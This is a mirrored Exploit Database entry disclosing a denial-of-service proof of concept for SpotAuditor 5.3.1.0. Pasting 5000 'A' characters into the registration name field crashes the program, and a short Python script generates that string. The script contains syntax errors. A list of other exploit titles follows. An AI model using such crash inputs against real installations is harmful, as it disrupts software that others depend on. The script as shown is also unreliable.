SpotAuditor 5.3.1.0 – Denial of Service

Exploit Database
114 阅读

作者： Sanjana shetty

日期： 2019-10-14
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/47494/

# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
# Author: Sanjana Shetty
# Date: 2019-10-13
# Version: SpotAuditor 5.3.1.0
# Vendor Homepage: http://www.nsauditor.com
# Software link: http://spotauditor.nsauditor.com/


# <POC by Sanjana Shetty>
# Steps

[1] Install the SpotAuditor software

[2] Access the register functionality

[3] In the name field enter 5000 A's and press enter, this will crash the
application.

==== use below script to create 5000 A's to a text file and copy it to the name field============


print ("# POC by sanjana shetty")

try:
 f = open("file.txt","w")
 junk ="\x41" * 5000
 f.write(junk)
 print ("done")

except (Exception, e):

print ("#error - ") + str(e)

last Exploits
SpotAuditor 5.3.1.0 – Denial of Service的更多信息

Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow：
eDisplay Personal FTP Server 1.0.0 – Denial of Service (PoC)：
Mapscrn 2.03 – Local Buffer Overflow (PoC)：
Airlock WAF 4.2.4 – Overlong UTF-8 Sequence Bypass：
GOM Player 2.3.10.5266 – ‘.fpx’ Denial of Service：
Microsoft Edge Chakra – ‘EmitAssignment’ uses the ‘this’ Register Without Initializing：
OsiriX DICOM Viewer 8.0.1 – Memory Corruption：
Google Chrome < M73 - Double-Destruction Race in StoragePartitionService：